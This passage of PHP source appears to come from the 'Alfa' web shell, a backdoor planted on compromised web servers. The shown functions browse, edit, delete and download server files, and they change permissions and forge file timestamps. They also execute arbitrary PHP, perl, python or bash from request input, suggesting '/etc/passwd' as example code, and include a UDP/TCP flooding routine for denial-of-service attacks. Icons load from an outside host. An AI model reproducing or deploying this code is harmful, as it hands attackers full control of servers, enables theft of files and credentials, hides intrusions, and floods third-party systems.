                    $dirs[] = array_merge($tmp, array('type' => 'dir'));
                }
            }
        }
    }
    $GLOBALS['sort'] = $sort;
    function alfaCmp($a, $b)
    {
        if ($GLOBALS['sort'][0] != 'size') {
            return strcmp(strtolower($a[$GLOBALS['sort'][0]]), strtolower($b[$GLOBALS['sort'][0]])) * ($GLOBALS['sort'][1] ? 1 : -1);
        } else {
            return ($a['size'] < $b['size'] ? -1 : 1) * ($GLOBALS['sort'][1] ? 1 : -1);
        }
    }
    usort($files, "alfaCmp");
    usort($dirs, "alfaCmp");
    $files = array_merge($dirs, $files);
    $l = 0;
    $cc = 0;
    foreach ($files as $f) {
        $f['name'] = htmlspecialchars($f['name']);
        $newname = mb_strlen($f['name'], 'UTF-8') > 60 ? mb_substr($f['name'], 0, 60, 'utf-8') . '...' : $f['name'];
        $checkbox = 'checkbox' . $cc;
        $raw_name = rawurlencode($f['name']);
        $icon = $GLOBALS['DB_NAME']['show_icons'] ? '<img src="' . findicon($f['name'], $f['type']) . '" width="30" height="30">' : '';
        $style = $GLOBALS['DB_NAME']['show_icons'] ? 'position:relative;display:inline-block;bottom:12px;' : '';
        echo '<tr' . ($l ? ' class=l1' : '') . '><td><div class="myCheckbox"><input type="checkbox" name="f[]" value="' . $raw_name . '" class="chkbx" id="' . $checkbox . '"><label for="' . $checkbox . '"></label></div></td><td>' . $icon . '<div style="' . $style . '"><a class="main_name" href=javascript:void(0) onclick="' . ($f['type'] == 'file' ? 'editor(\'' . $raw_name . '\',\'auto\',\'\',\'\',\'\',\'' . $f['type'] . '\');">' . ($GLOBALS['cwd'] . $f['name'] == $GLOBALS['__file_path'] ? "<span class='shell_name' style='font-weight:unset;'>" . $f['name'] . "</span>" : htmlspecialchars($newname)) : 'g(\'FilesMan\',\'' . $f['path'] . '\');" title=' . $f['link'] . '><b>| ' . htmlspecialchars($f['name']) . ' |</b>') . '</a></td></div><td><span style="font-weight:unset;" class="main_size">' . ($f['type'] == 'file' ? alfaSize($f['size']) : $f['type']) . '</span></td><td><span style="font-weight:unset;" class="main_modify">' . $f['modify'] . '</span></td><td><span style="font-weight:unset;" class="main_owner_group">' . $f['owner'] . '/' . $f['group'] . '</span></td><td><a href=javascript:void(0) onclick="editor(\'' . $raw_name . '\',\'chmod\',\'\',\'\',\'\',\'' . $f['type'] . '\')">' . $f['perms'] . '</td><td><a class="actions" href="javascript:void(0);" onclick="editor(\'' . $raw_name . '\', \'rename\',\'\',\'\',\'\',\'' . $f['type'] . '\')">R</a> <a class="actions" href="javascript:void(0);" onclick="editor(\'' . $raw_name . '\', \'touch\',\'\',\'\',\'\',\'' . $f['type'] . '\')">T</a>' . ($f['type'] == 'file' ? ' <a class="actions" href="javascript:void(0);" onclick="editor(\'' . $raw_name . '\', \'edit\',\'\',\'\',\'\',\'' . $f['type'] . '\')">E</a> <a class="actions" href="javascript:void(0);" onclick="g(\'FilesTools\',null,\'' . $raw_name . '\', \'download\')">D</a>' : '') . '<a class="actions" href="javascript:void(0);" onclick="var chk = confirm(\'Are You Sure For Delete # ' . addslashes(rawurldecode($f['name'])) . ' # ?\'); chk ? g(\'FilesMan\',null,\'delete\', \'' . $raw_name . '\') : \'\';"> X </a></td></tr>';
        $l = $l ? 0 : 1;
        $cc++;
    }
    echo "<tr><td colspan=7>\n<input type=hidden name=a value='FilesMan'>\n<input type=hidden name=c value='" . htmlspecialchars(isset($GLOBALS['glob_chdir_false']) ? $_POST['c'] : $GLOBALS['cwd']) . "'>\n<input type=hidden name=charset value='" . (isset($_POST['charset']) ? $_POST['charset'] : '') . "'>\n<select id='tools_selector' name='alfa1'><option value='copy'>Copy</option><option value='move'>Move</option><option value='delete' selected>Delete</option><option value='zip'>Add 2 Compress (zip)</option><option value='unzip'>Add 2 Uncompress (zip)</option><option value='paste'>Paste / Zip / Unzip </option></select>\n<input type='submit' value=' '>\n</form></table></div></div>";
    alfafooter();
}
function alfaFilesTools()
{
    alfahead();
    echo "<div class=\"filestools\">";
    if (isset($_POST['alfa1'])) {
        $_POST['alfa1'] = rawurldecode($_POST['alfa1']);
    }
    $alfa1_decoded = $_POST['alfa1'];
    $chdir_fals = false;
    if (!@chdir($_POST['c'])) {
        $chdir_fals = true;
        $_POST['alfa1'] = $_POST["c"] . "/" . $_POST["alfa1"];
        $alfa_canruncmd = _alfa_can_runCommand(true, true);
        if ($alfa_canruncmd) {
            $slashed_alfa1 = addslashes($_POST['alfa1']);
            $file_info = explode(":", alfaEx('stat -c "%F:%U:%G:%s:%Y:0%a:%A" "' . $slashed_alfa1 . '"'));
            $perm_color_class = alfaEx("if [[ -w '" . $slashed_alfa1 . "' ]]; then echo main_green_perm; elif [[ -r '" . $slashed_alfa1 . "' ]]; then echo main_white_perm; else echo main_red_perm; fi");
        }
    }
    if ($_POST['alfa2'] == 'auto') {
        if (is_array(@getimagesize($_POST['alfa1']))) {
            $_POST['alfa2'] = 'image';
        } else {
            $_POST['alfa2'] = 'view';
            if ($chdir_fals) {
                if ($alfa_canruncmd) {
                    $mime = explode(":", alfaEx("file --mime-type '" . addslashes($_POST['alfa1']) . "'"));
                    $mimetype = $mime[1];
                    if (!empty($mimetype)) {
                        if (strstr($mimetype, "image")) {
                            $_POST['alfa2'] = 'image';
                        }
                    }
                }
            }
        }
    }
    if ($_POST['alfa2'] == "rename" && !empty($_POST['alfa3']) && @is_writable($_POST['alfa1'])) {
        $rename_cache = $_POST['alfa3'];
    }
    if (@$_POST['alfa2'] == 'mkfile') {
        $_POST['alfa1'] = trim($_POST['alfa1']);
        if ($chdir_fals && $alfa_canruncmd) {
            if (_alfa_is_writable($_POST["c"])) {
                alfaEx("cd '" . addslashes($_POST["c"]) . "';touch '" . addslashes($alfa1_decoded) . "'");
                $_POST['alfa2'] = "edit";
            }
        }
        if (!@file_exists($_POST['alfa1'])) {
            $fp = @fopen($_POST['alfa1'], 'w');
            if ($fp) {
                $_POST['alfa2'] = "edit";
                fclose($fp);
            }
        } else {
            $_POST['alfa2'] = "edit";
        }
    }
    if (!_alfa_file_exists(@$_POST['alfa1'])) {
        echo __pre() . "<center><p><div class=\"txtfont\"><font color='red'>!...FILE DOEST NOT EXITS...!</font></div></p></center></div><script>editor_error=false;removeHistory('" . $_POST['alfa4'] . "');</script>";
        alfaFooter();
        return;
    }
    if ($chdir_fals) {
        $filesize = $file_info[3];
        $uid["name"] = $file_info[1];
        $gid["name"] = $file_info[2];
        $permcolor = alfaPermsColor(array("class" => $perm_color_class, "num" => $file_info[5], "human" => $file_info[6]), true);
    } else {
        $uid = function_exists("posix_getpwuid") && function_exists("fileowner") ? @posix_getpwuid(@fileowner($_POST['alfa1'])) : '';
        $gid = function_exists("posix_getgrgid") && function_exists("filegroup") ? @posix_getgrgid(@filegroup($_POST['alfa1'])) : '';
        if (!$uid && !$gid) {
            $uid['name'] = function_exists("fileowner") ? @fileowner($_POST['alfa1']) : '';
            $gid['name'] = function_exists("filegroup") ? @filegroup($_POST['alfa1']) : '';
        }
        $permcolor = alfaPermsColor($_POST['alfa1']);
        $filesize = @filesize($_POST['alfa1']);
        if (!isset($uid['name'], $gid['name']) || empty($uid['name']) || empty($gid['name'])) {
            if (_alfa_can_runCommand()) {
                list($uid['name'], $gid['name']) = explode(":", alfaEx('stat -c "%U:%G" "' . addslashes($_POST["c"] . "/" . $_POST["alfa1"]) . '"'));
            }
        }
    }
    echo '<span class="editor_file_info_vars">Name:</span> ' . htmlspecialchars($alfa1_decoded) . ' <span class="editor_file_info_vars">Size:</span> ' . alfaSize($filesize) . ' <span class="editor_file_info_vars">Permission:</span> ' . $permcolor . ' <span class="editor_file_info_vars">Owner/Group:</span> ' . $uid['name'] . '/' . $gid['name'] . ' <span class="editor_file_info_vars">Directory:</span> ' . str_replace("//", "/", ($chdir_fals ? "" : $_POST['c'] . '/') . $_POST['alfa1']) . '<br><br>';
    if (empty($_POST['alfa2'])) {
        $_POST['alfa2'] = 'view';
    }
    if (!_alfa_is_dir($_POST['alfa1'])) {
        $m = array('View', 'Edit', 'Download', 'Highlight', 'Chmod', 'Rename', 'Touch', 'Delete', 'Image', 'Hexdump');
        $ftype = "file";
    } else {
        $m = array('Chmod', 'Rename', 'Touch');
        $ftype = "dir";
    }
    foreach ($m as $v) {
        echo $v == 'Delete' ? '<a href="javascript:void(0);" onclick="var chk=confirm(\'Are You Sure For Delete This File ?\');chk?editor(\'' . addslashes(!isset($rename_cache) ? $_POST['alfa1'] : $rename_cache) . '\',\'' . strtolower($v) . '\',\'\',\'' . $_POST['c'] . '\',\'' . $_POST['alfa4'] . '\',\'' . $ftype . '\'):\'\';"><span class="editor_actions">' . (strtolower($v) == @$_POST['alfa2'] ? '<b><span class="editor_actions"> ' . $v . ' </span> </b>' : $v) . ' | </span></a> ' : '<a href="javascript:void(0);" onclick="editor(\'' . addslashes(!isset($rename_cache) ? $_POST['alfa1'] : $rename_cache) . '\',\'' . strtolower($v) . '\',\'\',\'' . $_POST['c'] . '\',\'' . $_POST['alfa4'] . '\',\'' . $ftype . '\')"><span class="editor_actions">' . (strtolower($v) == @$_POST['alfa2'] ? '<b><span class="editor_actions"> ' . $v . ' </span> </b>' : $v) . ' | </span></a>';
    }
    echo "<br><br>";
    switch ($_POST['alfa2']) {
        case 'view':
            @chdir($_POST['c']);
            echo "<div class=\"editor-view\"><div class=\"view-content\"><p><button style=\"border-radius:10px;\" class=\"button\" onClick=\"copyToClipboard('view_ml_content');\">copy to clipboard</button></p><pre class=\"ml1\" id=\"view_ml_content\">";
            echo htmlspecialchars(__read_file($_POST['alfa1']));
            echo "</pre></div></div>";
            break;
        case 'highlight':
            @chdir($_POST['c']);
            if (@is_readable($_POST['alfa1'])) {
                echo "<div class=\"editor-view\"><div class=\"view-content\"><div class=\"ml1\" style=\"background-color: #e1e1e1;color:black;\">";
                $code = @highlight_file($_POST['alfa1'], true);
                echo str_replace(array('<span ', '</span>'), array('<font ', '</font>'), $code) . '</div></div></div>';
            }
            break;
        case 'delete':
            @chdir($_POST['c']);
            if (@is_writable($_POST['alfa1']) || isset($GLOBALS["glob_chdir_false"])) {
                $deleted = true;
                if (!@unlink($_POST['alfa1'])) {
                    $deleted = false;
                    if ($alfa_canruncmd) {
                        if (_alfa_is_writable($_POST['alfa1'])) {
                            alfaEx("rm -f '" . addslashes($_POST['alfa1']) . "'");
                            $deleted = true;
                        }
                    }
                }
                if ($deleted) {
                    echo 'File Deleted...<script>var elem = $("' . $_POST['alfa4'] . '").parentNode;elem.parentNode.removeChild(elem);delete editor_files["' . $_POST['alfa4'] . '"];</script>';
                } else {
                    echo "Error...";
                }
            }
            break;
        case 'chmod':
            @chdir($_POST['c']);
            if (!empty($_POST['alfa3'])) {
                $perms = 0;
                for ($i = strlen($_POST['alfa3']) - 1; $i >= 0; --$i) {
                    $perms += (int) $_POST['alfa3'][$i] * pow(8, strlen($_POST['alfa3']) - $i - 1);
                }
                if (!@chmod($_POST['alfa1'], $perms)) {
                    if ($chdir_fals && $alfa_canruncmd) {
                        alfaEx("cd '" . addslashes($_POST["c"]) . "';chmod " . addslashes($_POST['alfa3']) . " '" . addslashes($alfa1_decoded) . "'");
                        echo "Success!";
                    } else {
                        echo "<font color=\"#FFFFFF\"><b>Can't set permissions!</b></font><br><script>document.mf.alfa3.value=\"\";</script>";
                    }
                } else {
                    echo "Success!";
                }
            }
            clearstatcache();
            AlfaNum(8, 9, 10, 7, 6, 5, 4, 2, 1);
            if ($chdir_fals) {
                $file_perm = $file_info[5];
            } else {
                $file_perm = substr(sprintf('%o', @fileperms($_POST['alfa1'])), -4);
            }
            echo '<script>alfa3_="";</script><form onsubmit="editor(\'' . addslashes($_POST['alfa1']) . '\',\'' . $_POST['alfa2'] . '\',this.chmod.value,\'' . $_POST['c'] . '\',\'' . $_POST['alfa4'] . '\',\'' . $ftype . '\');return false;"><input type="text" name="chmod" value="' . $file_perm . '"><input type=submit value=" "></form>';
            break;
        case 'edit':
            @chdir($_POST['c']);
            if (!@is_writable($_POST['alfa1']) && !_alfa_is_writable($_POST['alfa1'])) {
                echo "File isn't writeable";
                break;
            }
            if (!empty($_POST['alfa3'])) {
                $_POST['alfa3'] = substr($_POST['alfa3'], 1);
                $time = @filemtime($_POST['alfa1']);
                $fp = @__write_file($_POST['alfa1'], $_POST['alfa3']);
                if ($chdir_fals && $alfa_canruncmd) {
                    $rname = $alfa1_decoded;
                    $randname = $rname . rand(111, 9999);
                    $filepath = dirname($_SERVER["SCRIPT_FILENAME"]) . "/" . $randname;
                    if ($fp = @__write_file($filepath, $_POST['alfa3'])) {
                        alfaEx("mv '" . addslashes($filepath) . "' '" . addslashes($_POST["alfa1"]) . "';rm -f '" . addslashes($filepath) . "'");
                    }
                }
                if ($fp) {
                    echo "Saved!<br><script>alfa3_=\"\";</script>";
                    @touch($_POST['alfa1'], $time, $time);
                }
            }
            echo '<button class="button" style="border-radius:10px;" onClick="copyToClipboard(\'edit_textarea_content\');">copy to clipboard</button><form id="editor_edit_area" onsubmit="editor(\'' . addslashes($alfa1_decoded) . '\',\'' . $_POST['alfa2'] . '\',\'1\'+this.text.value,\'' . $_POST['c'] . '\',\'' . $_POST['alfa4'] . '\',\'' . $ftype . '\');return false;"><p><input type="submit" value=" "></p><textarea name="text" id="edit_textarea_content" class="bigarea" onkeydown="saveByKey(event);">';
            echo htmlspecialchars(__read_file($_POST['alfa1']));
            echo "</textarea><p><input type=\"submit\" value=\" \"></p></form>";
            break;
        case 'hexdump':
            @chdir($_POST['c']);
            $c = __read_file($_POST['alfa1']);
            $n = 0;
            $h = array('00000000<br>', '', '');
            $len = strlen($c);
            for ($i = 0; $i < $len; ++$i) {
                $h[1] .= sprintf('%02X', ord($c[$i])) . ' ';
                switch (ord($c[$i])) {
                    case 0:
                        $h[2] .= ' ';
                        break;
                    case 9:
                        $h[2] .= ' ';
                        break;
                    case 10:
                        $h[2] .= ' ';
                        break;
                    case 13:
                        $h[2] .= ' ';
                        break;
                    default:
                        $h[2] .= $c[$i];
                        break;
                }
                $n++;
                if ($n == 32) {
                    $n = 0;
                    if ($i + 1 < $len) {
                        $h[0] .= sprintf('%08X', $i + 1) . '<br>';
                    }
                    $h[1] .= '<br>';
                    $h[2] .= "\n";
                }
            }
            echo '<div class="editor-view"><div class="view-content"><table cellspacing=1 cellpadding=5 bgcolor=black><tr><td bgcolor=gray><span style="font-weight: normal;"><pre>' . $h[0] . '</pre></span></td><td bgcolor=#282828><pre>' . $h[1] . '</pre></td><td bgcolor=#333333><pre>' . htmlspecialchars($h[2]) . '</pre></td></tr></table></div></div>';
            break;
        case 'rename':
            @chdir($_POST['c']);
            $alfa1_escape = addslashes($_POST["alfa1"]);
            $alfa3_escape = addslashes($_POST["alfa3"]);
            if (!empty($_POST['alfa3'])) {
                $cmd_rename = false;
                if ($chdir_fals && $alfa_canruncmd) {
                    if (_alfa_is_writable($_POST['alfa1'])) {
                        $alfa1_escape = addslashes($alfa1_decoded);
                        alfaEx("cd '" . addslashes($_POST['c']) . "';mv '" . $alfa1_escape . "' '" . addslashes($_POST['alfa3']) . "'");
                    } else {
                        $cmd_rename = true;
                    }
                } else {
                    $alfa1_escape = addslashes($_POST["alfa1"]);
                }
                if (!@rename($_POST['alfa1'], $_POST['alfa3']) && $cmd_rename) {
                    echo "Can't rename!<br>";
                } else {
                    echo 'Renamed!<script>try{$("' . $_POST['alfa4'] . '").innerHTML = "<div class=\'editor-icon\'>"+loadType(\'' . $alfa3_escape . '\',\'' . $ftype . '\',\'' . $_POST['alfa4'] . '\')+"</div><div class=\'editor-file-name\'>' . $alfa3_escape . '</div>";editor_files["' . $_POST['alfa4'] . '"].file = "' . $alfa3_escape . '";d.files.innerHTML = d.files.innerHTML.replace(/\\\'' . $alfa1_escape . '\\\'/g, "\'' . $alfa3_escape . '\'");d.files.innerHTML = d.files.innerHTML.replace(/value\\=\\"' . $alfa1_escape . '\\"/, \'value\\=\\"' . $alfa3_escape . '\\"\');d.files.innerHTML = d.files.innerHTML.replace(/' . $alfa1_escape . '\\<\\/a\\>/g, "' . $alfa3_escape . '</a>");d.files.innerHTML = d.files.innerHTML.replace(/Are You Sure For Delete # ' . $alfa1_escape . ' # \\?/, "Are You Sure For Delete # ' . $alfa3_escape . ' # ?");' . ($ftype == "dir" ? "updateDirsEditor('" . $_POST['alfa4'] . "','" . $alfa1_escape . "');" : "") . '}catch(e){console.log(e)}</script>';
                    $alfa1_escape = $alfa3_escape;
                }
            }
            echo '<form onsubmit="editor(\'' . $alfa1_escape . '\',\'' . $_POST['alfa2'] . '\',this.name.value,\'' . $_POST['c'] . '\',\'' . $_POST['alfa4'] . '\',\'' . $ftype . '\');return false;"><input type="text" name="name" value="' . addslashes(htmlspecialchars(isset($_POST['alfa3']) && $_POST['alfa3'] != '' ? $_POST['alfa3'] : $alfa1_decoded)) . '"><input type=submit value=" "></form>';
            break;
        case 'touch':
            @chdir($_POST['c']);
            if (!empty($_POST['alfa3'])) {
                $time = strtotime($_POST['alfa3']);
                if ($time) {
                    $touched = false;
                    if ($chdir_fals && $alfa_canruncmd) {
                        alfaEx("cd '" . addslashes($_POST["c"]) . "';touch -d '" . htmlspecialchars(addslashes($_POST['alfa3'])) . "' '" . addslashes($alfa1_decoded) . "'");
                        $touched = true;
                    }
                    if (!@touch($_POST['alfa1'], $time, $time) && !$touched) {
                        echo "Fail!";
                    } else {
                        echo "Touched!";
                    }
                } else {
                    echo "Bad time format!";
                }
            }
            clearstatcache();
            echo '<script>alfa3_="";</script><form onsubmit="editor(\'' . addslashes($_POST['alfa1']) . '\',\'' . $_POST['alfa2'] . '\',this.touch.value,\'' . $_POST['c'] . '\',\'' . $_POST['alfa4'] . '\',\'' . $ftype . '\');return false;"><input type=text name=touch value="' . date("Y-m-d H:i:s", $chdir_fals ? $file_info[4] : @filemtime($_POST['alfa1'])) . '"><input type=submit value=" "></form>';
            break;
        case 'image':
            @chdir($_POST['c']);
            echo "<hr>";
            $file = $_POST['alfa1'];
            $image_info = @getimagesize($file);
            if (is_array($image_info) || $chdir_fals) {
                $width = (int) $image_info[0];
                $height = (int) $image_info[1];
                if ($chdir_fals && $alfa_canruncmd) {
                    $source = alfaEx("cat '" . addslashes($file) . "' | base64");
                    list($width, $height) = explode(":", alfaEx("identify -format '%w:%h' '" . addslashes($file) . "'"));
                    $mime = explode(":", alfaEx("file --mime-type '" . addslashes($file) . "'"));
                    $image_info['mime'] = $mime[1];
                } else {
                    $source = __ZW5jb2Rlcg(__read_file($file, false));
                }
                $image_info_h = "Image type = <span>[</span> " . $image_info['mime'] . " <span>]</span><br>Image Size = <span>[ </span>" . $width . " x " . $height . "<span> ]</span><br>";
                if ($width > 800) {
                    $width = 800;
                }
                echo $content = "<div class='editor-view'><div class='view-content'><center>" . $image_info_h . "<br><img id='viewImage' style='max-width:100%;border:1px solid green;' src='data:" . $image_info['mime'] . ";base64," . $source . "' alt='" . $file . "'></center></div></div><br>";
            }
            break;
    }
    echo "</div>";
    alfaFooter();
}
function findicon($file, $type)
{
    $s = 'http://solevisible.com/icons/';
    $types = array('json', 'ppt', 'pptx', 'xls', 'xlsx', 'msi', 'config', 'cgi', 'pm', 'c', 'cpp', 'cs', 'java', 'aspx', 'asp', 'db', 'ttf', 'eot', 'woff', 'woff2', 'woff', 'conf', 'log', 'apk', 'cab', 'bz2', 'tgz', 'dmg', 'izo', 'jar', '7z', 'iso', 'rar', 'bat', 'sh', 'alfa', 'gz', 'tar', 'php', 'php4', 'php5', 'phtml', 'html', 'xhtml', 'shtml', 'htm', 'zip', 'png', 'jpg', 'jpeg', 'gif', 'bmp', 'ico', 'txt', 'js', 'rb', 'py', 'xml', 'css', 'sql', 'htaccess', 'pl', 'ini', 'dll', 'exe', 'mp3', 'mp4', 'm4a', 'mov', 'flv', 'swf', 'mkv', 'avi', 'wmv', 'mpg', 'mpeg', 'dat', 'pdf', '3gp', 'doc', 'docx', 'docm');
    if ($type != 'file') {
        return $file == '..' ? "http://solevisible.com/icons/back.png" : "http://solevisible.com/icons/folder.png";
    } else {
        $ext = explode('.', $file);
        $ext = end($ext);
        $ext = strtolower($ext);
        return in_array($ext, $types) ? $s . $ext . '.png' : "http://solevisible.com/icons/notfound.png";
    }
}
function alfadlfile()
{
    if (isset($_POST['c'], $_POST['file'])) {
        $basename = rawurldecode(basename($_POST['file']));
        $_POST['file'] = str_replace("//", "/", $_POST['c'] . '/' . $basename);
        $alfa_canruncmd = _alfa_can_runCommand(true, true);
        if (@is_file($_POST['file']) && @is_readable($_POST['file']) || $alfa_canruncmd) {
            ob_start("ob_gzhandler", 4096);
            header("Content-Disposition: attachment; filename=\"" . addslashes($basename) . "\"");
            header("Content-Type: application/octet-stream");
            if (isset($GLOBALS["glob_chdir_false"])) {
                $randname = $basename . rand(111, 9999);
                $scriptpath = dirname($_SERVER["SCRIPT_FILENAME"]);
                $filepath = $scriptpath . "/" . $randname;
                if (_alfa_is_writable($scriptpath)) {
                    alfaEx("cp '" . addslashes($_POST["file"]) . "' '" . addslashes($filepath) . "'");
                    readfile($filepath);
                    @unlink($filepath);
                } else {
                    alfaEx("cat '" . addslashes($_POST["file"]) . "'");
                }
            } else {
                readfile($_POST['file']);
            }
        } else {
            echo "Error...!";
        }
    }
}
function alfaphpeval()
{
    alfahead();
    if (isset($_POST['alfa2']) && $_POST['alfa2'] == 'ini') {
        echo "<div class=header>";
        ob_start();
        $INI = ini_get_all();
        print "<table border=0><tr><td class=\"listing\"><font class=\"highlight_txt\">Param</td><td class=\"listing\"><font class=\"highlight_txt\">Global value</td><td class=\"listing\"><font class=\"highlight_txt\">Local Value</td><td class=\"listing\"><font class=\"highlight_txt\">Access</td></tr>";
        foreach ($INI as $param => $values) {
            print "\n<tr><td class=\"listing\"><b>" . $param . '</td>' . '<td class="listing">' . $values['global_value'] . ' </td>' . '<td class="listing">' . $values['local_value'] . ' </td>' . '<td class="listing">' . $values['access'] . ' </td></tr>';
        }
        $tmp = ob_get_clean();
        $tmp = preg_replace('!(body|a:\\w+|body, td, th, h1, h2) {.*}!msiU', '', $tmp);
        $tmp = preg_replace('!td, th {(.*)}!msiU', '.e, .v, .h, .h th {$1}', $tmp);
        echo str_replace('<h1', '<h2', $tmp) . '</div><br>';
    }
    if (isset($_POST['alfa2']) && $_POST['alfa2'] == 'info') {
        echo "<div class=header><style>.p {color:#000;}</style>";
        ob_start();
        phpinfo();
        $tmp = ob_get_clean();
        $tmp = preg_replace('!(body|a:\\w+|body, td, th, h1, h2) {.*}!msiU', '', $tmp);
        $tmp = preg_replace('!td, th {(.*)}!msiU', '.e, .v, .h, .h th {$1}', $tmp);
        echo str_replace('<h1', '<h2', $tmp) . '</div><br>';
    }
    if (isset($_POST['alfa2']) && $_POST['alfa2'] == 'exten') {
        echo "<div class=header>";
        ob_start();
        $EXT = get_loaded_extensions();
        echo '<table border=0><tr><td class="listing">' . implode("</td></tr>\n<tr><td class=\"listing\">", $EXT) . '</td></tr></table>' . count($EXT) . ' extensions loaded';
        echo "</div><br>";
    }
    $lang_html = "";
    foreach (array("php" => "php ~> [ Windows / Linux ]", "perl" => "perl ~> [ Linux ]", "python" => "python ~> [ Linux ]", "bash" => "bash ~> [ Linux ]") as $key => $val) {
        $lang_html .= '<option value="' . $key . '" ' . ($_POST["alfa3"] == $key ? "selected" : "") . '>' . $val . '</option>';
    }
    echo '<div class=header><Center><a href=javascript:void(0) onclick="g(\'phpeval\',null,\'\',\'ini\')">| INI_INFO | </a><a href=javascript:void(0) onclick="g(\'phpeval\',null,\'\',\'info\')"> | phpinfo |</a><a href=javascript:void(0) onclick="g(\'phpeval\',null,\'\',\'exten\')"> | extensions |</a></center><br><form name=pf method=post onsubmit="g(\'phpeval\',null,this.code.value,null,this.language.value); return false;"><div class="txtfont">Select Language: </div> <select name="language" style="width:300px;">' . $lang_html . '</select><br><br><textarea placeholder="file_get_contents(\'/etc/passwd\');" name=code class=bigarea id=PhpCode>' . (!empty($_POST['alfa1']) ? htmlspecialchars($_POST['alfa1']) : '') . '</textarea><center><input type="submit" value="" style="margin-top:5px"></center>';
    echo '</form><pre id=PhpOutput style="' . (empty($_POST['alfa1']) ? 'display:none;' : '') . 'margin-top:5px;" class=ml1>';
    if (!empty($_POST['alfa1'])) {
        if ($_POST['alfa3'] == "php") {
            ob_start();
            eval($_POST['alfa1']);
            $result = htmlspecialchars(ob_get_clean());
        } elseif (_alfa_can_runCommand() && $GLOBALS["sys"] == "unix") {
            if (isset($_SESSION["eval_tmpdir"])) {
                $tempdir = $_SESSION["eval_tmpdir"];
            } else {
                $tempdir = dirname(alfaEx("mktemp"));
                $_SESSION["eval_tmpdir"] = $tempdir;
            }
            $lang = $_POST['alfa3'];
            $filename = "temp" . rand(11111, 99999);
            $temp = $tempdir . "/" . $filename;
            __write_file($filename, $_POST['alfa1']);
            $result = alfaEx("mv {$filename} {$temp};{$lang} {$temp};rm -f {$temp}");
            @unlink($filename);
            @unlink($temp);
        }
        echo '<textarea class=bigarea id="PhpCode">' . $result . '</textarea>';
    }
    echo "</pre></div>";
    alfafooter();
}
function alfahash()
{
    if (!function_exists('hex2bin')) {
        function hex2bin($p)
        {
            return decbin(hexdec($p));
        }
    }
    if (!function_exists('full_urlencode')) {
        function full_urlencode($p)
        {
            $r = '';
            for ($i = 0; $i < strlen($p); ++$i) {
                $r .= '%' . dechex(ord($p[$i]));
            }
            return strtoupper($r);
        }
    }
    $stringTools = array('Base64_encode ( $string )' => '__ZW5jb2Rlcg($s)', 'Base64_decode ( $string )' => '__ZGVjb2Rlcg($s)', 'strrev ( $string )' => 'strrev($s)', 'bin2hex ( $string )' => 'bin2hex($s)', 'hex2bin ( $string )' => 'hex2bin($s)', 'md5 ( $string )' => 'md5($s)', 'sha1 ( $string )' => 'sha1($s)', 'hash ( "sha251", $string ) --> sha251' => 'hash("sha256",$s)', 'hash ( "sha384", $string ) --> sha384' => 'hash("sha384",$s)', 'hash ( "sha512", $string ) --> sha512' => 'hash("sha512",$s)', 'crypt ( $string )' => 'crypt($s)', 'crc32 ( $string )' => 'crc32($s)', 'str_rot13 ( $string )' => 'str_rot13($s)', 'urlencode ( $string )' => 'urlencode($s)', 'urldecode  ( $string )' => 'urldecode($s)', 'full_urlencode  ( $string )' => 'full_urlencode($s)', 'htmlspecialchars  ( $string )' => 'htmlspecialchars($s)', 'base64_encode (gzdeflate( $string , 9)) --> Encode' => '__ZW5jb2Rlcg(gzdeflate($s, 9))', 'gzinflate (base64_decode( $string )) --> Decode' => '@gzinflate(__ZGVjb2Rlcg($s))', 'str_rot13 (base64_encode( $string )) --> Encode' => 'str_rot13(__ZW5jb2Rlcg($s))', 'base64_decode (str_rot13( $string )) --> Decode' => '__ZGVjb2Rlcg(str_rot13($s))', 'str_rot13 (base64_encode(gzdeflate( $string , 9))) --> Encode' => 'str_rot13(__ZW5jb2Rlcg(gzdeflate($s,9)))', 'gzinflate (base64_decode(str_rot13( $string ))) --> Decode' => '@gzinflate(__ZGVjb2Rlcg(str_rot13($s)))');
    alfahead();
    echo "<div class=header>";
    echo "<form onSubmit='g(\"hash\",null,this.selectTool.value,this.input.value);return false;'><div class='txtfont'>Method:</div> <select name='selectTool' style='width:400px;'>";
    foreach ($stringTools as $k => $v) {
        echo "<option value='" . htmlspecialchars($v) . "' " . ($_POST['alfa1'] == $v ? 'selected' : '') . ">" . $k . "</option>";
    }
    echo "</select> <input type='submit' value=' '/><br><textarea  name='input' style='margin-top:5px' class='bigarea'>" . (empty($_POST['alfa1']) ? '' : htmlspecialchars(@$_POST['alfa2'])) . "</textarea></form>";
    if (!empty($_POST['alfa1'])) {
        $string = addslashes($_POST['alfa2']);
        $string = str_replace('\\"', '"', $string);
        $alg = $_POST['alfa1'];
        $code = str_replace('$s', "'" . $string . "'", $alg);
        ob_start();
        eval('echo ' . $code . ';');
        $res = ob_get_contents();
        ob_end_clean();
        if (in_array($alg, $stringTools)) {
            echo '<textarea class="bigarea" id="PhpCode">' . htmlspecialchars($res) . '</textarea>';
        }
    }
    echo "</div>";
    alfaFooter();
}
function alfados()
{
    alfahead();
    echo "<div class=header>";
    echo "<center><p><div class=\"txtfont_header\">| DOS |</div></p><form onSubmit=\"g('dos',null,this.host.value,this.time.value,this.port.value,this.m.value); return false;\"><div class=\"txtfont\">Method : <select name=\"m\" style=\"width:80px;\"><option value=\"udp\">UDP</option><option value=\"tcp\">TCP</option></select> Host : <input name=\"host\" type=\"text\" value=\"localhost\" size=\"25\" /> Time : <input name=\"time\" type=\"text\" size=\"15\" /> Port : <input name=\"port\" type=\"text\" size=\"10\" /> <input type=\"submit\" value=\" \" /></div></form></center><br>";
    if (!empty($_POST['alfa1']) && !empty($_POST['alfa2']) && !empty($_POST['alfa3'])) {
        echo __pre();
        $packets = 0;
        ignore_user_abort(true);
        $exec_time = (int) $_POST['alfa2'];
        $time = time();
        $max_time = $exec_time + $time;
        $host = $_POST['alfa1'];
        $port = (int) $_POST['alfa3'];
        $method = $_POST['alfa4'];
        $out = str_repeat('X', 65000);
        while (1) {
            $packets++;
            if (time() > $max_time) {
                break;
            }
            $fp = @fsockopen($method . '://' . $host, $port, $errno, $errstr, 5);
            if ($fp) {
                fwrite($fp, $out);
                fclose($fp);
            }
        }
        echo "<center>{$packets} (" . @round($packets * 65 / 1024, 2) . " MB) packets averaging " . @round($packets / $exec_time, 2) . " packets per second</center>";
        echo "</pre>";
    }
    echo "</div>";
    alfafooter();
}
function __pre()
{
    return '<pre id="strOutput" style="margin-top:5px" class="ml1">';
}
function alfaIndexChanger()
{
    alfahead();
